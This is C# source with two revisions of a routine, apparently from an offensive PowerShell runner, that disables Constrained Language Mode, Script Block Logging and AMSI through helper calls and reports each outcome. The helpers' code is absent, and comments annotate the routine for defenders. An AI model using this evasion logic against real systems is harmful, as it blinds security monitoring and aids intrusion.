/// <summary>
/// Runs the three bypass helpers (DisableClm.DoDisable, DisableScriptLogging, DisableAmsi)
/// against the runspace <paramref name="rs"/> and reports each outcome through Info().
/// Note for defenders: the language-mode check is itself a PowerShell expression executed
/// through ExecuteCommand, so the probe and the per-step result lines are observable
/// artifacts of this routine; what each helper does internally is not visible here.
/// </summary>
/// <param name="rs">PowerShell object the bypass helpers and ExecuteCommand operate on.</param>
/// <param name="host">Host passed to ExecuteCommand for the language-mode probe.</param>
/// <returns>true only if every helper returned true; a later success cannot hide an earlier failure because results are combined with <c>&amp;=</c>.</returns>
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
    bool ret = true;
    ret &= DisableClm.DoDisable(rs);
    // Read back the effective language mode after the CLM attempt.
    string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
    Info($"[.] Language Mode: {l}");
    // The CLM step is reported as successful only if the helper returned true AND the
    // runspace now reports FullLanguage (case-insensitive, current-culture comparison).
    if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
    {
        Info("[+] Constrained Language Mode Disabled.");
    }
    else
    {
        Info("[-] Constrained Language Mode not disabled.");
    }
    // Each remaining step is folded into ret before the message is chosen.
    if ((ret &= DisableScriptLogging(rs)))
    {
        Info("[+] Script Block Logging Disabled.");
    }
    else
    {
        Info("[-] Script Block Logging not disabled.");
    }
    if ((ret &= DisableAmsi(rs)))
    {
        Info("[+] AMSI Disabled.");
    }
    else
    {
        Info("[-] AMSI not disabled.");
    }
    return(ret);
}
/// <summary>
/// Later revision of DisableDefenses: probes the PowerShell version first, skips every
/// bypass step (returning true) when the version parses below 5 and ProgramOptions.Force is
/// not set, otherwise attempts the CLM, Script Block Logging and AMSI helpers in turn and
/// reports each outcome through Info(). Note for defenders: the version probe and both
/// language-mode probes are PowerShell expressions executed through ExecuteCommand, so they
/// are observable in whatever the runspace records; the helpers' internals are not visible here.
/// </summary>
/// <param name="rs">PowerShell object the bypass helpers and ExecuteCommand operate on.</param>
/// <param name="host">Host passed to ExecuteCommand and to DisableClm.DoDisable.</param>
/// <returns>true if every attempted step succeeded, or if all steps were skipped on the version check; false once any step fails.</returns>
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
    bool ret = true;
    // Version is obtained as "Major.Minor" text from the runspace; Trim() is applied to the
    // raw ExecuteCommand result (a null result would fault here before the try block).
    string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
    float psversion = 5;
    try
    {
        // Note: this replaces the calling thread's CurrentCulture and never restores it,
        // a process-visible side effect; it is also redundant with the InvariantCulture
        // argument passed to float.Parse below.
        System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
        customCulture.NumberFormat.NumberDecimalSeparator = ".";
        System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
        psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
    }
    catch (FormatException e)
    {
        // Only FormatException is handled; the default of 5 is kept in that case.
        Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
    }
    // Early exit returns the still-true ret, i.e. "success" without any step having run.
    if (psversion < 5.0 && !ProgramOptions.Force)
    {
        Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
        Info("Skipping bypass procedures...");
        return(ret);
    }
    else
    {
        Info($"[.] Powershell's version: {psversion}");
    }
    l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
    Info($"[.] Language Mode: {l}");
    // CLM step runs only when the runspace is not already FullLanguage
    // (case-insensitive, current-culture comparison).
    if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
    {
        DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
        // Flag set whenever the CLM helper was invoked, regardless of its result;
        // presumably consumed by a cleanup routine elsewhere in the file.
        CleanupNeeded = true;
        // Success is judged by re-reading the language mode, not by a return value.
        l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
        Info($"[.] Language Mode after attempting to disable CLM: {l}");
        if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
        {
            Info("[+] Constrained Language Mode Disabled.");
            ret &= true; // no-op; kept for symmetry with the failure branch
        }
        else
        {
            Info("[-] Constrained Language Mode not disabled.");
            ret &= false;
        }
    }
    else
    {
        Info("[+] No need to disable Constrained Language Mode. 
Already in FullLanguage.");
    }
    // Remaining steps are folded into ret before the message is chosen, so a later
    // success cannot hide an earlier failure.
    if ((ret &= DisableScriptLogging(rs)))
    {
        Info("[+] Script Block Logging Disabled.");
    }
    else
    {
        Info("[-] Script Block Logging not disabled.");
    }
    if ((ret &= DisableAmsi(rs)))
    {
        Info("[+] AMSI Disabled.");
    }
    else
    {
        Info("[-] AMSI not disabled.");
    }
    Info("");
    return(ret);
}